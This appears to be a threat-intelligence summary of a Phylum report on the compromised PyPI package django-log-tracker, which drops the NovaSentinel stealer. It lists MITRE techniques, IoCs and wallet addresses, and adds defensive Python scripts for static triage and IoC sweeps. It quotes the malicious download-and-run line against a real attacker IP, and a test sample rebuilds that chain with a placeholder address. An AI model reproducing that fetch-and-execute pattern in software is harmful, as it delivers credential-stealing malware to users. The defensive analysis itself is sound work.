Dormant PyPI Package Updated to Deploy NovaSentinel Stealer

A PyPI package named django-log-tracker was updated with malicious code, likely via a compromised PyPI account rather than legitimate repository activity. The update downloads and executes a NovaSentinel stealer payload, with a configuration that targets browser secrets, crypto wallets, tokens, and various applications, underscoring supply-chain risk in open-source software. #NovaSentinel #PyPI #Chrome #Discord

Keypoints

  • Malicious update to the PyPI package django-log-tracker, distinct from the package's April 2022 activity, which suggests account compromise.
  • Code behind the update downloads and runs an updater executable from a hardcoded IP address.
  • The dropped payload is an NSIS installer containing an Electron app with NovaSentinel stealer functionality.
  • NovaSentinel attempts to steal browser secrets, crypto wallets, Discord tokens, and other credentials, and to persist across Chrome, Discord, Exodus, Mullvad, Atomic, and MailSpring.
  • The malware includes a clipboard hijacker configuration and scheduled tasks StartCacaTask and WindowsDriverSetup for persistence.
  • IOCs include hardcoded wallet addresses and crypto transaction history, highlighting financial leakage risk.
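The download-and-run chain described above (a URL built from a bare IP, a fetch to disk, then a launch of the fetched file) is simple enough to triage statically. The following is an added example, not Phylum's tooling or code from the package: it parses a module with the standard `ast` module and reports whether all three stages are present. The function names, the call-name lists and both sample sources are assumptions; the suspect sample uses a TEST-NET placeholder address rather than the real indicator.

```python
"""
Static triage of a Python module for a download-and-execute chain:
  1. a string literal that is an http(s) URL to a bare IPv4 address,
  2. a call that fetches a remote resource to disk,
  3. a call that hands a file path to the OS for execution.
Added example; function names and samples are assumptions.
"""
import ast
import re
import textwrap

# Call names (attribute or bare) that fetch a remote resource. Assumed list.
DOWNLOAD_CALLS = {"urlretrieve", "urlopen", "get", "request"}
# Call names that launch a program or a file. Assumed list.
EXEC_CALLS = {"startfile", "system", "popen", "Popen", "run",
              "call", "check_call", "check_output"}

IP_URL = re.compile(r"^https?://(\d{1,3}\.){3}\d{1,3}(/|$)")


def _call_name(node: ast.Call) -> str:
    """Leaf name of the callee: os.startfile -> 'startfile', run(...) -> 'run'."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def triage_source(source: str) -> dict:
    """Collect the three stages and say whether they all appear together."""
    tree = ast.parse(source)
    findings = {"ip_url": [], "download": [], "execute": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IP_URL.match(node.value):
                findings["ip_url"].append(node.value)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DOWNLOAD_CALLS:
                findings["download"].append(f"{name}@L{node.lineno}")
            elif name in EXEC_CALLS:
                findings["execute"].append(f"{name}@L{node.lineno}")
    findings["download_and_execute"] = all(
        findings[k] for k in ("ip_url", "download", "execute"))
    return findings


# Constructed sample mirroring the pattern in the report; the IP is a
# TEST-NET placeholder, not the real indicator, and this text is only parsed.
SUSPECT = textwrap.dedent('''
    import os, tempfile, urllib.request
    URL = "http://192.0.2.10/placeholder/Updater_x64.exe"
    fullPath = os.path.join(tempfile.gettempdir(), "Updater_x64.exe")
    urllib.request.urlretrieve(URL, fullPath)
    os.startfile(fullPath)
''')

# Constructed benign sample: a log helper with no network or exec calls.
BENIGN = textwrap.dedent('''
    import logging
    def track(msg):
        logging.getLogger("django").info(msg)
''')


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, triage_source(src))
```

Run it over the files of an installed package (or a freshly unpacked sdist) before trusting a version bump on a package that has been idle for a long time; a positive is a reason to read the file, not a verdict, since legitimate installers also fetch and run things.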

MITRE Techniques

  • [T1195] Supply Chain Compromise – Malicious code reached victims through a trusted package registry rather than a direct intrusion. “The attack vector appeared to be an attempted supply-chain attack via a compromised PyPI account.”
  • [T1078] Valid Accounts – The compromise stemmed from a compromised PyPI account used to publish the malicious package. “…compromised PyPI account.”
  • [T1105] Ingress Tool Transfer – The code downloads and executes an updater from a hardcoded URL/IP: “URL = ‘http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe’ … os.startfile(fullPath)”
  • [T1027.001] Obfuscated/Compressed Files and Information – Heavily obfuscated JavaScript inside the NSIS installer leading to the NovaSentinel stealer. “heavily obfuscated JavaScript”
  • [T1053.005] Scheduled Task – Persistence via scheduled tasks StartCacaTask and WindowsDriverSetup. “registered as a scheduled task called ‘StartCacaTask’ … and ‘WindowsDriverSetup’.”
  • [T1555.003] Credentials from Web Browsers – The stealer attempts to harvest browser secrets as part of its data theft. “steal browser secrets”

Indicators of Compromise

  • [IP Address] 45.88.180.54 – used to host and fetch the updater executable
  • [URL] http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe – the download location
  • [File Name] Updater_1.4.4_x64.exe – the deceptive updater name
  • [Wallet Address] eth_address: “0xb95C23e1aE44b00C160546eb70D383563142A1AE”, btc_address: “bc1qzgr9wcq28tu9md02rfp5f4tjvsguz7x2a00eye”
  • [Wallet Address] ltc_address, xlm_address, dash_address, bch_address, xrp_address, doge_address, etc., embedded in the clipboard hijacker config
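The scheduled-task names and the network indicators above can be swept for with a few lines of parsing. The following is an added example, not Phylum's code: it reads the CSV shape produced by `schtasks /query /fo CSV` (columns `TaskName`, `Next Run Time`, `Status`) and matches task names against the two names from the report, and it scans arbitrary text such as a proxy log for the IP, URL and file name. Both sample inputs are constructed; the function names are assumptions.

```python
"""
IoC sweep for the persistence and network indicators in the report.
Added example; the schtasks output and proxy log below are constructed.
"""
import csv
import io

# Task names from the report.
TASK_IOCS = {"StartCacaTask", "WindowsDriverSetup"}
# Network and file indicators from the report.
NETWORK_IOCS = {
    "45.88.180.54",
    "http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe",
    "Updater_1.4.4_x64.exe",
}


def suspicious_tasks(schtasks_csv: str) -> list:
    """Task paths whose leaf name matches a known persistence task."""
    wanted = {t.lower() for t in TASK_IOCS}
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        name = (row.get("TaskName") or "").strip()
        if name == "TaskName":
            # schtasks can repeat the header row for each task folder.
            continue
        leaf = name.rsplit("\\", 1)[-1]
        if leaf.lower() in wanted:
            hits.append(name)
    return hits


def network_hits(text: str) -> list:
    """(line number, indicator) pairs for every IoC substring found."""
    found = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for ioc in NETWORK_IOCS:
            if ioc in line:
                found.append((lineno, ioc))
    return sorted(found)


# Constructed sample in the shape of `schtasks /query /fo CSV`.
SAMPLE_SCHTASKS = r'''"TaskName","Next Run Time","Status"
"\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready"
"\StartCacaTask","2/28/2024 9:00:00 AM","Ready"
"\WindowsDriverSetup","N/A","Running"
'''

# Constructed proxy log lines; the second carries the report's download URL.
SAMPLE_PROXY_LOG = """\
2024-02-27 10:01:02 10.0.0.7 GET https://pypi.org/simple/django-log-tracker/ 200
2024-02-27 10:01:05 10.0.0.7 GET http://45.88.180.54/DONTTUCHTHIS/Updater_1.4.4_x64.exe 200
"""


if __name__ == "__main__":
    print("tasks:", suspicious_tasks(SAMPLE_SCHTASKS))
    print("network:", network_hits(SAMPLE_PROXY_LOG))
```

Feed `suspicious_tasks` the saved output of `schtasks /query /fo CSV` from each host, and `network_hits` any text you already collect (proxy or DNS logs, package caches); a hit on either list is a strong signal because neither task name nor the `DONTTUCHTHIS` path has any legitimate use.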

Read more: https://blog.phylum.io/dormant-pypi-package-updated-to-deploy-novasentinel-stealer/